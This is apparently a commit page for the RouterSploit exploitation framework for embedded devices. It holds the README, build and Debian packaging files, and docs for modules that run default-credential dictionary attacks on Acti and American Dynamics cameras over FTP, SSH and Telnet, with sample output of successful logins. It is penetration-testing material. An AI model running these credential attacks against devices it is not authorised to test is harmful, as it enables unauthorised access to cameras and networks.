Commit 6f2e8a7d authored by dmknght's avatar dmknght
Browse files

Upload source code to nest

parents
# Contribution Guidelines
There are many ways to contribute to RouterSploit project, and the routersploit team is grateful for all contributions. This overview summarizes the most important steps to get you started as a contributor.
* Report bugs to the routersploit issue tracker.
* Make suggestions for changes, updates, or new features to the routersploit issue tracker.
* Contribute bug fixes, example code, documentation, or tutorials to routersploit.
* Contribute new features to routersploit.
## Bug reports
When submitting bug reports, please consider providing the following information:
* Reproduction steps: step by step description to reproduce the problem.
* Expected: Describe the behavior you expect.
* Actual: Describe the behavior you see.
## Testing
It is hard to test modules in all possible scenarios. If you would like to help:
1. Check what device you have - identify vendor and version.
2. Check if routersploit contains exploits for the device you posses.
3. If exploit does not work but it should, check "show info" for more information. References should provide you with links to proof of concept exploits.
Example:
```
References:
- https://www.exploit-db.com/exploits/24975/
```
4. Try to use proof of concept exploit and check if it works properly. If it does, feel free to create new issue bug with explanation that the routersploit's module does not work properly.
## Development
* [Creating exploit module](https://github.com/reverse-shell/routersploit/wiki/Creating-Exploit)
* [Creating creds module](https://github.com/reverse-shell/routersploit/wiki/Creating-Creds)
* [Creating scanner module](https://github.com/reverse-shell/routersploit/wiki/Creating-Scanner)
FROM python:3.6
COPY requirements.txt /tmp/requirements.txt
RUN python -m pip install -r /tmp/requirements.txt
WORKDIR /routersploit
COPY . .
CMD ["python", "rsf.py"]
Copyright 2018, The RouterSploit Framework (RSF) by Threat9
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of RouterSploit Framework nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The above licensing was taken from the BSD licensing and is applied to RouterSploit Framework as well.
Note that the RouterSploit Framework is provided as is, and is a royalty free open-source application.
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit.
recursive-include routersploit/resources/ssh_keys *.json *.key
recursive-include routersploit/resources/vendors *.dat
recursive-include routersploit/resources/wordlists *.txt
.PHONY: build run test lint lint-modules clean prune help
DIRECTORY=.
EXCLUDED=.git,rsf.py
RSF_IMAGE=routersploit
FLAKE8_IGNORED_RULES=E501,F405,F403
build:
docker build -t $(RSF_IMAGE) .
run:
docker run -it --rm $(RSF_IMAGE)
lint:
python3 -m flake8 --exclude=$(EXCLUDED) --ignore=$(FLAKE8_IGNORED_RULES) $(DIRECTORY)
tests: clean
python3 -m pytest -n16 tests/core/ tests/test_exploit_scenarios.py tests/test_module_info.py
python3 -m pytest -n16 tests/exploits/ tests/creds/ tests/encoders/ tests/generic/ tests/payloads/
clean:
find . -name '*.pyc' -exec rm -f {} +
find . -name '*.pyo' -exec rm -f {} +
find . -name '*~' -exec rm -f {} +
prune:
docker images -q -f dangling=true | xargs docker rmi
docker ps -q -f status=exited | xargs docker rm
help:
@echo " run"
@echo " Run Routersploit in docker container"
@echo " lint"
@echo " Check style with flake8."
@echo " test"
@echo " Run test suite"
@echo " clean"
@echo " Remove python artifacts."
@echo " prune"
@echo " Remove dangling docker images and exited containers."
# RouterSploit - Exploitation Framework for Embedded Devices
[![Python 3.6](https://img.shields.io/badge/Python-3.6-yellow.svg)](http://www.python.org/download/)
[![Build Status](https://travis-ci.org/threat9/routersploit.svg?branch=master)](https://travis-ci.org/threat9/routersploit)
The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.
[![asciicast](https://asciinema.org/a/180370.png)](https://asciinema.org/a/180370)
It consists of various modules that aids penetration testing operations:
* exploits - modules that take advantage of identified vulnerabilities
* creds - modules designed to test credentials against network services
* scanners - modules that check if a target is vulnerable to any exploit
* payloads - modules that are responsible for generating payloads for various architectures and injection points
* generic - modules that perform generic attacks
# Installation
## Requirements
Required:
* future
* requests
* paramiko
* pysnmp
* pycrypto
Optional:
* bluepy - bluetooth low energy
## Installation on Kali Linux
```
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
```
Bluetooth Low Energy support:
```
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
```
## Installation on Ubuntu 18.04 & 17.10
```
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
```
Bluetooth Low Energy support:
```
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
```
## Installation on OSX
```
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
```
## Running on Docker
```
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit
```
# Update
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
```
cd routersploit
git pull
```
# License
The RouterSploit Framework is under a BSD license.
Please see [LICENSE](LICENSE) for more details.
routersploit (3.4.0-0kali1) kali-dev; urgency=medium
* Import new upstream release
-- Sophie Brun <sophie@freexian.com> Thu, 18 Oct 2018 09:12:34 +0200
routersploit (3.3.0-0kali1) kali-dev; urgency=medium
* Import new upstream release
-- Sophie Brun <sophie@freexian.com> Tue, 10 Jul 2018 12:12:21 +0200
routersploit (3.2.0-0kali1) kali-dev; urgency=medium
* New upstream version 3.2.0
* Use pybuild to build the package
* Add a patch to improve setup.py
* Add a symlink to keep routersploit as command
* Remove useless debian/docs (we have a debian/routersploit.docs)
-- Sophie Brun <sophie@freexian.com> Tue, 26 Jun 2018 10:49:16 +0200
routersploit (3.1.0-0kali1) kali-dev; urgency=medium
* Import new upstream release
-- Sophie Brun <sophie@freexian.com> Tue, 12 Jun 2018 14:05:05 +0200
routersploit (3.0.0-0kali1) kali-dev; urgency=medium
* Import new usptream release
-- Sophie Brun <sophie@freexian.com> Tue, 29 May 2018 11:02:00 +0200
routersploit (2.2.1-0kali1) kali-dev; urgency=medium
* Import new upstream release
-- Sophie Brun <sophie@freexian.com> Fri, 16 Jun 2017 11:47:36 +0200
routersploit (2.0.0+git20160426-0kali2) kali-dev; urgency=medium
* Update debian/watch
-- Sophie Brun <sophie@freexian.com> Wed, 27 Apr 2016 11:13:40 +0200
routersploit (2.0.0+git20160426-0kali1) kali-dev; urgency=medium
* Initial release (Closes: 0003255)
-- Sophie Brun <sophie@freexian.com> Tue, 26 Apr 2016 10:36:39 +0200
Source: routersploit
Section: misc
Priority: optional
Maintainer: Kali Developers <devel@kali.org>
Uploaders: Sophie Brun <sophie@freexian.com>
Build-Depends: debhelper (>=11), dh-python, python3-all, python3-setuptools
Standards-Version: 4.2.1
Homepage: https://github.com/reverse-shell/routersploit
Vcs-Git: git://git.kali.org/packages/routersploit.git
Vcs-Browser: http://git.kali.org/gitweb/?p=packages/routersploit.git;a=summary
Package: routersploit
Architecture: all
Depends: ${misc:Depends},
${python3:Depends}
Recommends: python3-bluepy
Description: Exploitation Framework for Embedded Devices
This package contains an open-source exploitation framework dedicated to
embedded devices. It consists of various modules that aids penetration testing
operations:
* exploits - modules that take advantage of identified vulnerabilities.
* creds - modules designed to test credentials against network services.
* scanners - modules that check if target is vulnerable to any exploit.
* payloads - modules that are responsible for generating payloads for various
architectures and injection points.
* generic - modules that perform generic attacks.
Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Upstream-Name: routersploit
Source: https://github.com/reverse-shell/routersploit
Files: *
Copyright: 2016-2018, The RouterSploit Framework (RSF) by Threat9
License: BSD-3-clause
Files: routersploit/libs/lzs/lzs.py
Copyright: 2011 Filippo Valsorda - FiloSottile
License: GPL-3+
This package is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
.
This package is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
.
On Debian systems, the complete text of the GNU General
Public License version 3 can be found in "/usr/share/common-licenses/GPL-3"
Files: debian/*
Copyright: 2016-2018 Sophie Brun <sophie@freexian.com>
License: BSD-3-clause
License: BSD-3-clause
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
.
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
usr/bin/rsf.py usr/bin/routersploit
#!/usr/bin/make -f
%:
dh $@ --with python3 --buildsystem=pybuild
override_dh_auto_test:
# don't run the tests: a requirement is missing: threat9-test-bed
#python3 -m pytest
version=4
opts=filenamemangle=s/.*\/v(\d[\d.]*)\.tar\.gz/routersploit-$1\.tar\.gz/ \
https://github.com/reverse-shell/routersploit/tags .*/v?(\d[\d.]*)\.tar\.gz debian uupdate
## Description
Module performs dictionary attack with default credentials against Acti Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/ftp_default_creds
rsf (Acti Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Acti Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/ssh_default_creds
rsf (Acti Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Acti Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/telnet_default_creds
rsf (Acti Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against American Dynamics Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/american_dynamics/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/american_dynamics/ftp_default_creds
rsf (American Dynamics Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (American Dynamics Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against American Dynamics Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/american_dynamics/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/american_dynamics/ssh_default_creds
rsf (American Dynamics Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (American Dynamics Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
Markdown is supported
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment